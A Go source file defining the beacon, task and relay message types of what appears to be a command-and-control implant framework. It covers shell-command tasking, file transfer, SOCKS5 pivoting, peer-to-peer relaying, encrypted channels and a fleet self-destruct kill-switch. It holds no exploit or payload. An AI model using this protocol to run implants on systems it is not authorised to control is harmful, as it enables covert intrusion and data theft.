package protocol

// CurrentProtocolVersion is the supported protocol version.
// Increment when making breaking changes to the wire format.
const CurrentProtocolVersion uint = 2

// Protocol v2 (breaking change over v1):
//   - envelopes carry a monotonic per-agent sequence number (seq) and a
//     Unix timestamp (ts); the server enforces a sliding replay window and
//     persists last_seq per implant.
//   - the shared beacon key is no longer transmitted on the wire. It is only
//     used to derive a per-agent registration key (HKDF) that authenticates
//     the one-time registration handshake which binds the agent identity
//     public key (id_pub).
//   - after registration, session keys are derived from X25519 key agreement
//     using the agent identity key, so the server can re-establish a session
//     from the persisted identity public key after a restart.

// BeaconRequest is sent by agent to server on each check-in.
type BeaconRequest struct {
	UUID            string            `json:"uuid"`
	ProtocolVersion uint              `json:"pv,omitempty"`
	AgentVersion    string            `json:"av,omitempty"`
	Seq             uint64            `json:"seq,omitempty"`
	Ts              int64             `json:"ts,omitempty"`
	Info            map[string]string `json:"info,omitempty"`
	Results         []TaskResult      `json:"results,omitempty"`
	ResultIDs       []string          `json:"result_ids,omitempty"`
	AckTaskIDs      []uint            `json:"acks,omitempty"`
	TaskCapacity    *int              `json:"task_capacity,omitempty"`
	SocksData       []SocksFrame      `json:"socks_data,omitempty"`
	Relayed         []RelayedData     `json:"relayed,omitempty"`
	// RelayedFrames carries opaque v2 beacon envelopes from P2P children. The
	// parent never inspects or decrypts them: the envelope is authenticated
	// end-to-end against the server with the child's own session key.
	RelayedFrames []RelayedFrame `json:"relayed_frames,omitempty"`

	ECDHPub   string `json:"ecdh_pub,omitempty"`
	CipherB64 string `json:"c,omitempty"`

	// Registration handshake (one-time, authenticated by reg_hmac).
	IdentityPub string `json:"id_pub,omitempty"`
	RegHMAC     string `json:"reg_hmac,omitempty"`
}

// RelayedData carries child agent results forwarded by parent (P2P).
type RelayedData struct {
	AgentID    string       `json:"agent_id"`
	Results    []TaskResult `json:"results"`
	AckTaskIDs []uint       `json:"acks,omitempty"`
}

// RelayedFrame is an opaque v2 beacon envelope sent by a P2P child and
// forwarded verbatim by its parent. The Envelope field is the raw JSON
// envelope bytes (base64-encoded by encoding/json). The parent does not
// decrypt it; the server authenticates it with the child's session key.
type RelayedFrame struct {
	AgentID  string `json:"agent_id"`
	Envelope []byte `json:"envelope"`
}

// TaskResult is the result output from a completed agent task.
type TaskResult struct {
	TaskID   uint   `json:"task_id"`
	Type     string `json:"type"`
	Output   string `json:"output"`
	Error    string `json:"error,omitempty"`
	Encoding string `json:"encoding,omitempty"`
	Filename string `json:"filename,omitempty"`
	Size     int64  `json:"size,omitempty"`
	Offset   int64  `json:"offset,omitempty"`
	Path     string `json:"path,omitempty"`
	// ResultID is a per-result unique id generated by the agent, used for
	// idempotency auditing of replayed or duplicated results.
	ResultID string `json:"rid,omitempty"`
	// MAC is the HMAC-SHA256 of the chunked file-transfer integrity chain
	// computed by the agent (upload / chunked-download results). The server
	// verifies it before committing the chunk to disk.
	MAC string `json:"mac,omitempty"`
	// EncryptedWithTaskKey flags that Output was sealed with the per-task
	// AES-256-GCM key (task.Key) rather than the shared session key, giving
	// per-result confidentiality independent of the beacon channel. The server
	// decrypts using the key it generated for this task.
	EncryptedWithTaskKey bool `json:"etk,omitempty"`
}

// BeaconResponse is sent by server to agent in reply to a check-in.
type BeaconResponse struct {
	Tasks           []Task        `json:"tasks"`
	ProtocolVersion uint          `json:"pv,omitempty"`
	Seq             uint64        `json:"seq,omitempty"`
	RegOK           bool          `json:"reg_ok,omitempty"`
	Rekey           bool          `json:"rekey,omitempty"`
	SocksFrames     []SocksFrame  `json:"socks_frames,omitempty"`
	SocksFastMode   bool          `json:"socks_fast,omitempty"`
	Relayed         []RelayedTask `json:"relayed,omitempty"`
	// RelayedFrames carries opaque response envelopes destined for P2P children.
	// The parent forwards each envelope verbatim to the matching child.
	RelayedReplies []RelayedReply `json:"relayed_replies,omitempty"`
	ExtC2Data      []string       `json:"extc2_data,omitempty"`

	// Fleet kill-switch broadcast (set only while armed): KillSwitch is the
	// per-arm token (hex), KillSwitchMAC its per-implant authentication tag
	// HMAC-SHA256(regKey-derived kill-switch key, token). The agent verifies
	// both before self-destructing.
	KillSwitch    string `json:"kill_switch,omitempty"`
	KillSwitchMAC string `json:"kill_switch_mac,omitempty"`

	ECDHPub   string `json:"ecdh_pub,omitempty"`
	CipherB64 string `json:"c,omitempty"`

	// LastSeq is the server's authoritative highest acknowledged sequence
	// number. The agent fast-forwards its local sequence if it has fallen
	// behind (e.g. after a state reset) rather than blindly jumping.
	LastSeq uint64 `json:"last_seq,omitempty"`
}

// RelayedTask carries tasks destined for child agents (P2P).
type RelayedTask struct {
	AgentID string `json:"agent_id"`
	Tasks   []Task `json:"tasks"`
}

// RelayedReply is an opaque v2 response envelope built by the server for a
// P2P child. The parent forwards it verbatim over the child's channel.
type RelayedReply struct {
	AgentID  string `json:"agent_id"`
	Envelope []byte `json:"envelope"`
}

// Task is a command or operation dispatched to an agent.
type Task struct {
	ID        uint   `json:"id"`
	Type      string `json:"type"`
	Command   string `json:"command"`
	Encrypted bool   `json:"enc,omitempty"`
	Shell     string `json:"shell"`
	Path      string `json:"path,omitempty"`
	Data      string `json:"data,omitempty"`
	Offset    int64  `json:"offset,omitempty"`
	Size      int64  `json:"size,omitempty"`
	// PrevMAC is the previous link in the file-transfer integrity chain
	// (hex, empty = first chunk, seeded with 32 zero bytes).
	PrevMAC string `json:"prev_mac,omitempty"`
	// MAC is the expected HMAC-SHA256 of Data for this push-upload chunk. The
	// agent recomputes it and refuses to write on mismatch.
	MAC string `json:"mac,omitempty"`
	// Key carries an operator-issued, per-task AES-256-GCM key (base64) used to
	// seal this task's result independently of the session key (P2: per-task
	// encryption). Empty means the result travels under the normal channel key.
	Key string `json:"key,omitempty"`
}

// SocksFrame carries SOCKS5 proxy relay data between agent and server.
type SocksFrame struct {
	ConnID uint64 `json:"conn_id"`
	Action string `json:"action"`
	Data   []byte `json:"data,omitempty"`
}
